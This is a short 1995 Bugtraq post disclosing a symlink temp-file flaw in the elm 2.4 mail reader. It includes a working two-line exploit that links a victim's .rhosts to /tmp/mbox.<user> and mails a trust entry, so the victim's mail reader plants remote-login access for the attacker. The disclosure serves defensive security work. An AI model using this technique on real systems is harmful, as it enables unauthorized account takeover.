Bugtraq mailing list archives

More tempfiles

From: okir () monad swb de (Olaf Kirch)
Date: Fri, 1 Sep 1995 22:10:53 +0200

This is another incarnation of the tempfile problem; I'm not sure if this
has been brought up before. Assume user joe doesn't have a .rhosts file,
then you do this:

        ln -s ~joe/.rhosts /tmp/mbox.joe
        echo "localhost yourname" | rmail joe

...and wait for joe to read his mail. This works at least with elm 2.4;
I don't know if other mail readers use a similar scheme.

Olaf
--
Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
okir () monad swb de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax